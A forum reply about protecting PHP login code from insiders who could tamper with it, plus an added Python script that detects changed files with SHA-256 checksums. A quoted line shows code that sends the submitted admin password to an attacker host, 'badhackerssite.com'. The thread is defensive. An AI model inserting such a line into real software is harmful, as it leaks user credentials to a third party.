Posted by Malcolm Dew-Jones on 10/08/10 11:27
Han (googlepost@safeblue.com) wrote:
: Passwords are not stored in plaintext. However, still it's a 2 secs job
: to change this line
: if(strcmp(sha1('admin'.$_REQUEST['pass']),$adminpass)){
: to
: fopen('http://www.badhackerssite.com/'.$_REQUEST['pass'], "r");
: if(strcmp(sha1('admin'.$_REQUEST['pass']),$adminpass)){
: The admin password is leaked the next time user logs in.
: [excuse the syntax errors]
It's only a 2 secs job if the computer is not secure. If you can't trust
the people with privileged passwords then you're stuck.
In that case, you may wish to have a second "more trusted" person to audit
the computer at random intervals using a check sum program to identify
changes and inspect them. (This is a good idea anyway to identify hacker
intrusions, and to catalog exactly when other changes occurred).
--
This programmer available for rent.
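As an added example, not code from the thread or from either poster: a minimal version of the checksum audit suggested above, written in Python. It records SHA-256 digests of every file under a web root, then later reports which files were modified, added or removed. The temporary directory, file names and file contents are constructed for the demo.

```python
import hashlib
import tempfile
from pathlib import Path


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large files do not load into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict[str, str]:
    """Map each regular file under root (as a relative path) to its digest.
    In real use the baseline must be kept somewhere the audited machine's
    administrators cannot write to, otherwise it can be altered along with the code."""
    return {str(p.relative_to(root)): hash_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def audit(root: Path, baseline: dict[str, str]) -> dict[str, list[str]]:
    """Compare the current tree against the baseline and report every difference."""
    current = build_baseline(root)
    return {
        "modified": sorted(f for f in baseline if f in current and current[f] != baseline[f]),
        "added": sorted(f for f in current if f not in baseline),
        "removed": sorted(f for f in baseline if f not in current),
    }


def demo() -> dict[str, list[str]]:
    """Constructed scenario: baseline a tiny web root, then tamper with it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        login = root / "login.php"
        login.write_text("<?php if (strcmp(sha1('admin'.$_REQUEST['pass']), $adminpass) == 0) { /* ok */ }\n")
        (root / "index.php").write_text("<?php echo 'hello';\n")
        baseline = build_baseline(root)  # taken while the tree is still trusted
        # Constructed tampering: an extra line appears in the login script,
        # a new file shows up, and an existing file disappears.
        login.write_text("<?php // (constructed) an unexpected extra line\n" + login.read_text())
        (root / "shell.php").write_text("<?php // (constructed) new file\n")
        (root / "index.php").unlink()
        return audit(root, baseline)


if __name__ == "__main__":
    print(demo())
```

A single changed byte in login.php is enough to flag it, which is exactly the kind of edit the quoted post describes; the report tells the auditor which files to inspect by hand.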